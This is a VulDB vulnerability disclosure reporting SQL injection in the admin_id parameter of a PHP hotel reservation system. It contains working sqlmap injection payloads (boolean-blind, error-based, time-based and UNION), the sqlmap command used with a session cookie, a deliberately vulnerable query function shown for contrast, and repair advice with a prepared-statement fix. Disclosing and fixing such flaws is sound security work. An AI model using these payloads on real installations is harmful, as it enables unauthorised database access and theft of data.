Submission #698602: Campcodes Online Hotel Reservation System V1.0 SQL Injection (information)

Title: Campcodes Online Hotel Reservation System V1.0 SQL Injection
Description:

## Vulnerability Type

- SQL injection

## Root Cause

In Online Hotel Reservation System, "/admin/edit_account.php" contains a SQL injection vulnerability. The endpoint can be attacked directly with blind SQL injection: an attacker observes the application's response, or other visible behaviour, to determine whether an injected condition was evaluated as true, and from there probes and extracts the data in the database.

## Impact

Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, take full control of the system, and even interrupt service, posing a serious threat to system security and business continuity.

# DESCRIPTION

A SQL injection vulnerability was found in "/admin/edit_account.php" of Online Hotel Reservation System. The endpoint can be attacked directly with blind SQL injection: the attacker injects conditional statements and relies on the application's Boolean-condition-dependent behaviour to learn about the database contents, trying different conditions and verifying each one from the application's response. When building the SQL query, the program uses the user-supplied ID directly, without any validation or filtering, so arbitrary SQL queries can be executed by supplying a malicious id.

<img width="1761" height="267" alt="Image" src="https://github.com/user-attachments/assets/9095c3d7-2266-47bb-b811-a50e453b7d43" />

# Vulnerability details and POC

## Vulnerability location:

- 'admin_id' parameter

## Payload:

```text
sqlmap identified the following injection point(s) with a total of 188 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' RLIKE (SELECT (CASE WHEN (5972=5972) THEN 8 ELSE 0x28 END))-- ahJK

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' OR (SELECT 4154 FROM(SELECT COUNT(*),CONCAT(0x71716a7071,(SELECT (ELT(4154=4154,1))),0x71707a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aSmr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' AND (SELECT 5382 FROM (SELECT(SLEEP(5)))JxeN)-- ACBL

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=-7918' UNION ALL SELECT CONCAT(0x71716a7071,0x49676e4b615544736a6274577948477a484a74514b67554f58754a536461574a4242794e53497748,0x71707a6b71),NULL,NULL,NULL#
---
```

## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

```bash
python3 sqlmap.py -u "http://192.168.126.133:82/admin/edit_account.php?admin_id=8*" --dbs --cookie PHPSESSID=fqdj4cl33n649v1gon6fm8krl2
```

<img width="1706" height="646" alt="Image" src="https://github.com/user-attachments/assets/c4bb8230-62a4-4e25-8a4a-c8d0474e3d29" />

# Suggested repair

1. **Use prepared statements and parameter binding:** Prepared statements prevent SQL injection because they separate SQL code from user-supplied data. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as SQL code.
2. **Input validation and filtering:** Strictly validate and filter user input to ensure it conforms to the expected format.
3. **Minimize database user permissions:** Ensure that the account used to connect to the database has only the minimum permissions it needs. Avoid using highly privileged accounts (such as 'root' or 'admin') for day-to-day operations.
4. **Regular security audits:** Regularly audit code and systems to identify and fix potential security vulnerabilities promptly.
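The root cause described above (the user-supplied admin_id concatenated straight into the query) and repair items 1 and 2, shown side by side as an added PHP example. This is not code from the Campcodes project or from the report author; the table and column names (`admins`, `admin_id`, `username`, `email`), the use of PDO, and the DSN in the usage sketch are assumptions.

```php
<?php
// Added example, not the project's own edit_account.php. Table and column
// names and the DSN are assumptions.

// --- Vulnerable pattern: the raw request parameter is concatenated into the
// SQL text, so a value containing a quote character and SQL operators changes
// the meaning of the statement. This is the shape of bug the report describes.
function findAdminUnsafe(mysqli $db, string $adminId): ?array
{
    $sql = "SELECT * FROM admins WHERE admin_id = '" . $adminId . "'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// --- Hardened version: validate the type first (repair item 2), then bind the
// value so the driver hands it to MySQL as data, never as SQL (repair item 1).
function findAdminSafe(PDO $db, string $rawAdminId): ?array
{
    // admin_id is assumed to be a numeric primary key, so anything that is not
    // a positive integer is rejected before it reaches the database.
    $adminId = filter_var(
        $rawAdminId,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($adminId === false) {
        http_response_code(400);
        return null;
    }

    // Only the columns the edit form needs; the placeholder is bound as an
    // integer, so the statement text never contains user input.
    $stmt = $db->prepare(
        'SELECT admin_id, username, email FROM admins WHERE admin_id = :id'
    );
    $stmt->bindValue(':id', $adminId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage sketch for edit_account.php (assumed DSN, database name and credentials):
// $db = new PDO(
//     'mysql:host=127.0.0.1;dbname=hotel;charset=utf8mb4',
//     'hotel_app',      // least-privilege account (repair item 3), not root
//     'change-me',
//     [
//         PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//         PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
//     ]
// );
// $admin = findAdminSafe($db, $_GET['admin_id'] ?? '');
```

Setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the MySQL server parse the statement before the bound value is supplied, which is what gives prepared statements their guarantee. Note that the report's own sqlmap command passes a `PHPSESSID` cookie, so the endpoint was exercised with an authenticated session; the fix therefore belongs in the data-access code itself, not in a session check alone.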
Source: ⚠️ https://www.yuque.com/u42535181/pm5nde/gv2vlzfghq5uaxwe#
User: xinyi (UID 91409)
Submitted: 2025-11-20 10:21 (5 months ago)
Moderated: 2025-11-22 20:23 (2 days later)
Status: Duplicate
VulDB entry: 332458 [code-projects Simple Online Hotel Reservation System 1.0 /admin/edit_account.php admin_id SQL injection]
Points: 0
